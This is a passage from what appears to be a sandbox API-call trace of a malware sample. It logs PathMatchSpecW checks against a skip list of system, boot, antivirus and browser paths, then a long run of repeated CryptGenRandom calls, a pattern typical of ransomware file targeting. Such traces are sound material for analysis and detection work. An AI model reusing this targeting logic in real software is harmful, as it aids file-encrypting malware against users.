PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*.msi") returned 0 [0169.393] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*.scf") returned 0 [0169.393] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0169.393] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0169.393] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*AppData*") returned 0 [0169.393] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0169.393] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0169.393] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*\\java\\*") returned 0 [0169.393] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0169.393] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*\\windows\\*") returned 0 [0169.393] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0169.394] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0169.394] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0169.394] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0169.394] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*Atheros*") returned 0 [0169.394] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*Realtek*") returned 0 [0169.394] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*bootmgr*") returned 0 [0169.394] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*boot*") returned 0 [0169.394] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*boot*") returned 0 [0169.394] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0169.394] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*IO.SYS*") returned 0 [0169.394] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0169.394] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0169.394] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*ntldr*") returned 0 [0169.394] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*chrome*") returned 0 [0169.394] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*opera*") returned 0 [0169.394] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*firefox*") returned 0 [0169.394] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui", pszSpec="*") returned 1 [0169.394] strlen (_Str="NMoreira") returned 0x8 [0169.394] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.394] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.394] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.394] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.394] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.394] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.394] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.394] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.394] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.394] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.394] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.394] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.394] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.394] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.394] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.394] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.394] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.394] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.395] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 